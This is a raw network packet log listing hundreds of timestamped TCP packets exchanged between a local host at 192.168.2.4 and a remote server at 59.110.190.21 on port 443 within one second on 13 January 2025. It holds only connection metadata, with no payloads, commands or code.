Jan 13, 2025 13:54:17.129940987 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.129996061 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.130047083 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.130095005 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.130131006 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.130176067 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.130963087 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.131025076 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.131038904 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.131088018 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.131113052 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.131158113 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.131813049 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.131850958 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.131860018 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.131867886 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.131895065 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.131902933 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.131983042 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.132034063 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.179980993 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.180068016 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.180085897 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.180136919 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.180263042 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.180305958 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.182449102 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.182532072 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.186796904 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.186866045 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.187808037 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.187875986 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.192681074 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.192744970 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.194442987 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.194504023 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.198879004 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.198945045 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.201225996 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.201288939 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.203444958 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.203538895 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.207673073 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.207734108 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.209997892 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.210057974 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.214335918 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.214440107 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.216562986 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.216625929 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.218852043 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.218929052 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.223160028 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.223278046 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.225452900 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.225536108 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.229917049 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.229976892 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.232172966 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.232242107 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.236603975 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.236665010 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.238770008 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.238852024 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.241101980 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.241161108 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.245832920 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.245893002 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.248346090 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.248402119 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.253797054 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.253861904 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.256957054 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.257019043 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.257031918 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.257081032 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.269299984 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.269356012 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.269378901 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.269433022 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.269453049 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.269462109 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.269470930 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.269479990 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.269503117 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.269535065 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.269866943 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.269917011 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.273200035 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.273257971 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.281582117 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.281683922 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.287111998 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.287183046 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.298489094 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.298587084 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.298823118 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.298885107 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.299307108 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.299364090 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.299503088 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.299549103 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.301814079 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.301889896 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.311114073 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.311206102 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.311291933 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.311331034 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.311352968 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.311369896 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.311400890 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.311427116 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.311443090 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.311505079 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.311609983 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.311667919 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.314138889 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.314202070 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.316607952 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.316684961 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.320822954 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.320888042 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.323071957 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.323160887 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.427046061 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.427160978 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.427761078 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.427833080 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.429899931 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.429972887 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.433860064 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.433928013 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.436016083 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.436081886 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.440128088 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.440224886 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.442161083 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.442240953 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.444350958 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.444425106 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.448640108 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.448699951 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.450634003 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.450715065 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.454710960 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.454781055 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.456806898 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.456876040 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.459084988 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.459156036 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.463001013 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.463104963 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.468715906 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.468774080 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.469161034 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.469219923 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.471303940 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.471391916 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.475455046 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.475538969 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.479212999 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.479285002 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.482831001 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.482893944 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.484344006 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.484446049 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.485559940 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.485615969 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.490281105 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.490334034 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.491799116 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.491847992 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.493707895 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.493779898 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.497754097 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.497801065 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.500313044 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.500360012 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.503828049 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.503901005 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.506004095 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.506062031 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.507992983 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.508061886 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.512465954 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.512533903 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.514077902 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.514177084 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.518032074 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.518099070 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.520126104 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.520174026 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.524151087 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.524214983 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.526149988 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.526216984 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.528100967 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.528187990 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.531938076 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.531987906 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.534099102 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.534152031 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.537889957 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.537955999 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.539832115 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.539910078 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.541749954 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.541796923 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.545819998 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.545871019 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.547581911 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.547629118 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.551047087 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.551112890 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.552927017 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.552998066 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.554754972 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.554811001 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.558087111 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.558141947 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.559864998 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.559921026 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.563049078 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.563110113 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.564778090 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.564838886 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.568167925 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.568219900 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.570300102 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.570353031 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.572369099 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.572416067 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.574549913 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.574599028 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.578464985 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.578548908 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.582473993 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.582526922 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.582611084 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.582667112 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.586564064 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.586620092 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.586759090 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.586817026 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.592726946 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.592780113 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.592811108 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.592864037 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.596967936 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.597045898 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.602883101 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.602977991 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.680644035 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.680759907 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.683518887 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.683675051 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.685520887 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.685585022 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.689862967 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.689949036 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.691709042 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.691836119 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.693877935 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.693947077 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.698014021 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.698084116 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.700083971 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.700151920 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.704447031 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.704529047 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.706327915 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.706440926 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.710448027 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.710519075 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.716216087 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.716259956 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.716289043 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.716327906 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.716361046 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.718070984 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.718782902 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.718847036 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.722932100 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.722990990 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.724850893 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.724920034 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.726955891 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.727014065 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.729202986 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.729276896 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.733056068 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.733129025 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.735126019 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.735191107 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.743596077 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.743654966 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.743669033 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.743720055 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.745414972 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.745475054 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.747478008 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.747550964 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.751416922 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.751554012 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.753376007 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.753441095 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.755378008 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.755441904 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.761557102 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.761631966 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.762191057 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.762250900 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.763786077 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.763850927 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.767838955 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.767908096 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.769958973 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.770025015 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.774322987 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.774467945 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.776181936 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.776261091 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.780301094 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.780366898 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.782463074 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.782527924 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.784450054 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.784543991 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.787664890 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.787717104 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.787734985 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.787755966 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.787785053 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.787805080 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.790746927 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.790791988 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.790815115 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.791337013 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.791457891 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.793173075 CET	443	49740	59.110.190.21	192.168.2.4
